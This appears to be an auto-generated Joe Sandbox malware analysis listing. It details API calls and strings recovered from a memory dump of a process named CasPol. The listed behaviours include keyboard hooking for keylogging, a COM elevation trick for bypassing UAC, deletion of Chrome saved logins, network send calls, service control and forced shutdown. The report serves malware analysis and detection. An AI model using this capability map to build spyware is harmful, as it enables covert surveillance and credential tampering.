                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                                            • API String ID: 0-3177665633
                                                                                                            • Opcode ID: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                                                            • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                            • Opcode Fuzzy Hash: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                                                            • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                            • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                            • String ID: 8[G
                                                                                                            • API String ID: 1888522110-1691237782
                                                                                                            • Opcode ID: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                                                                                                            • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                            • Opcode Fuzzy Hash: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                                                                                                            • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Object_wcslen
                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                            • API String ID: 240030777-3166923314
                                                                                                            • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                            • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                            • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                            • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                            APIs
                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3587775597-0
                                                                                                            • Opcode ID: e6033344e76624b76c557f99416062224b41f49b53caf68f690f3f5c68b54efc
                                                                                                            • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                            • Opcode Fuzzy Hash: e6033344e76624b76c557f99416062224b41f49b53caf68f690f3f5c68b54efc
                                                                                                            • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                            • String ID: <D$<D$<D
                                                                                                            • API String ID: 745075371-3495170934
                                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                            • String ID: Keylogger initialization failure: error $`#v
                                                                                                            • API String ID: 3219506041-3226811161
                                                                                                            • Opcode ID: 5dd7d4e87483909495a537fcad95406c8ded85d18e3ccefef833e7d42386b7cb
                                                                                                            • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                            • Opcode Fuzzy Hash: 5dd7d4e87483909495a537fcad95406c8ded85d18e3ccefef833e7d42386b7cb
                                                                                                            • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2341273852-0
                                                                                                            • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                            • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                            • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                            • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                            • API String ID: 341183262-3780268858
                                                                                                            • Opcode ID: 5c4d7f5cc93035747a764e7710dd22b22cb4f919a2a8588896b861aaa8e097fb
                                                                                                            • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                            • Opcode Fuzzy Hash: 5c4d7f5cc93035747a764e7710dd22b22cb4f919a2a8588896b861aaa8e097fb
                                                                                                            • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                            • API String ID: 2127411465-314212984
                                                                                                            • Opcode ID: f8d616d4508dc2c046470fb811fbd903af535893f3080e052b4e915e73f2105b
                                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                            • Opcode Fuzzy Hash: f8d616d4508dc2c046470fb811fbd903af535893f3080e052b4e915e73f2105b
                                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                                            Strings
                                                                                                            • UserProfile, xrefs: 0040B227
                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                            • Opcode ID: 0250d3fa7d8b70bc47a8355f7fd743dddf47cdaa6e39fb173e6c2dd5a2cb84fd
                                                                                                            • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                            • Opcode Fuzzy Hash: 0250d3fa7d8b70bc47a8355f7fd743dddf47cdaa6e39fb173e6c2dd5a2cb84fd
                                                                                                            • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 4043647387-0
                                                                                                            • Opcode ID: 5770e205a92bdaf62436f7e3a944b8f2fc74aac352c1461ab2ed34b4eace6724
                                                                                                            • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                            • Opcode Fuzzy Hash: 5770e205a92bdaf62436f7e3a944b8f2fc74aac352c1461ab2ed34b4eace6724
                                                                                                            • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                            • String ID:
                                                                                                            • API String ID: 276877138-0
                                                                                                            • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                            • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                            • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                            • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                                            • API String ID: 1589313981-1420736420
                                                                                                            • Opcode ID: 70035bef8a8482817f5ed11c5e7eeb401def3e9ea01ea4c5943ce5132b462a45
                                                                                                            • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                            • Opcode Fuzzy Hash: 70035bef8a8482817f5ed11c5e7eeb401def3e9ea01ea4c5943ce5132b462a45
                                                                                                            • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                            • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 2299586839-711371036
                                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                            • String ID: SETTINGS
                                                                                                            • API String ID: 3473537107-594951305
                                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1157919129-0
                                                                                                            • Opcode ID: ad182ef0116283bf3863836c6a83626c4c767cd38c875da217e7cde8bb8463e0
                                                                                                            • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                            • Opcode Fuzzy Hash: ad182ef0116283bf3863836c6a83626c4c767cd38c875da217e7cde8bb8463e0
                                                                                                            • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 1286116820-0
                                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                            APIs
